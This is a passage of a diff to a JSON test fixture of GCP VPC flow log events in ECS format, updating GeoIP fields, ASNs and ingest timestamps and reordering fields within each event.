{ - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33562, @@ -1873,7 +1963,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391254800Z", + "ingested": "2021-12-14T14:43:27.415181831Z", "original": "{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", @@ -1884,34 +1974,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "port": 9243, - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "source": { - "address": "10.49.136.133", - "port": 46864, - "bytes": 173805495, - "packets": 44438, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", - "bytes": 173805495, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 44438, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1922,6 +1984,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -1942,8 +2007,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 9243, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.49.136.133", + "port": 46864, + "bytes": 173805495, + "packets": 44438, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" + }, "event": { - "ingested": "2021-12-09T13:37:46.391260300Z", + "ingested": "2021-12-14T14:43:27.415182262Z", "original": "{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.306085222Z", @@ -1951,44 +2041,21 @@ "id": "ut8lbrffooxys", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 33478, - "bytes": 1468, - "ip": "67.43.156.13", - "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", - "bytes": 1468, + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", + "bytes": 173805495, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, + "packets": 44438, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1999,6 +2066,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -2019,8 +2089,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33478, + "bytes": 1468, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391265900Z", + "ingested": "2021-12-14T14:43:27.415182733Z", "original": "{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", @@ -2028,6 +2123,18 @@ "id": "ut8lbrffooxyx", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", + "bytes": 1468, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -2036,11 +2143,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33548, @@ -2118,7 +2230,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391271600Z", + "ingested": "2021-12-14T14:43:27.415183325Z", "original": "{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", @@ -2129,43 +2241,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65320, - "bytes": 70775, - "ip": "67.43.156.13", - "packets": 732 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", - "bytes": 70775, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 732, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -2176,6 +2251,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -2196,8 +2274,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65320, + "bytes": 70775, + "ip": "67.43.156.13", + "packets": 732 + }, "event": { - "ingested": "2021-12-09T13:37:46.391277200Z", + "ingested": "2021-12-14T14:43:27.415183902Z", "original": "{\"insertId\":\"ut8lbrffooxz3\",\"jsonPayload\":{\"bytes_sent\":\"70775\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65320},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"732\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", @@ -2205,6 +2308,18 @@ "id": "ut8lbrffooxz3", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", + "bytes": 70775, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 732, + "direction": "inbound" } }, { @@ -2219,11 +2334,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -2295,7 +2415,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391282700Z", + "ingested": "2021-12-14T14:43:27.415184425Z", "original": "{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", @@ -2317,11 +2437,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33548, @@ -2393,7 +2518,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391288500Z", + "ingested": "2021-12-14T14:43:27.415184917Z", "original": "{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", @@ -2404,41 +2529,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 34836, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1780, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", - "bytes": 1780, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -2449,6 +2539,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -2469,8 +2562,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 34836, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1780, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391292500Z", + "ingested": "2021-12-14T14:43:27.415185365Z", "original": "{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", @@ -2478,46 +2596,21 @@ "id": "ut8lbrffooxyy", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "vnm", - "city_name": "Vĩnh Yên", - "region_name": "Vinh Phuc Province" - }, - "as": { - "number": 45899 - }, - "address": "192.168.2.165", - "port": 59623, - "bytes": 1239, - "ip": "192.168.2.165", - "packets": 18 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", - "bytes": 1239, + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", + "bytes": 1780, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 18, - "direction": "inbound" - }, + "packets": 7, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2528,6 +2621,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -2548,8 +2644,30 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "vnm", + "city_name": "Vĩnh Yên", + "region_name": "Vinh Phuc Province" + }, + "as": { + "number": 45899 + }, + "address": "192.168.2.165", + "port": 59623, + "bytes": 1239, + "ip": "192.168.2.165", + "packets": 18 + }, "event": { - "ingested": "2021-12-09T13:37:46.391296900Z", + "ingested": "2021-12-14T14:43:27.415185758Z", "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", @@ -2557,6 +2675,18 @@ "id": "1ulp77rfdvho4g", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", + "bytes": 1239, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 18, + "direction": "inbound" } }, { @@ -2565,11 +2695,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -2647,7 +2782,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391301900Z", + "ingested": "2021-12-14T14:43:27.415186201Z", "original": "{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", @@ -2658,41 +2793,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33924, - "bytes": 1458, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2703,6 +2803,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -2723,8 +2826,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33924, + "bytes": 1458, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391306600Z", + "ingested": "2021-12-14T14:43:27.415186724Z", "original": "{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634435179Z", @@ -2732,6 +2860,18 @@ "id": "1ulp77rfdvho5k", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", + "bytes": 1458, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -2740,11 +2880,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33534, @@ -2822,7 +2967,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391310300Z", + "ingested": "2021-12-14T14:43:27.415187219Z", "original": 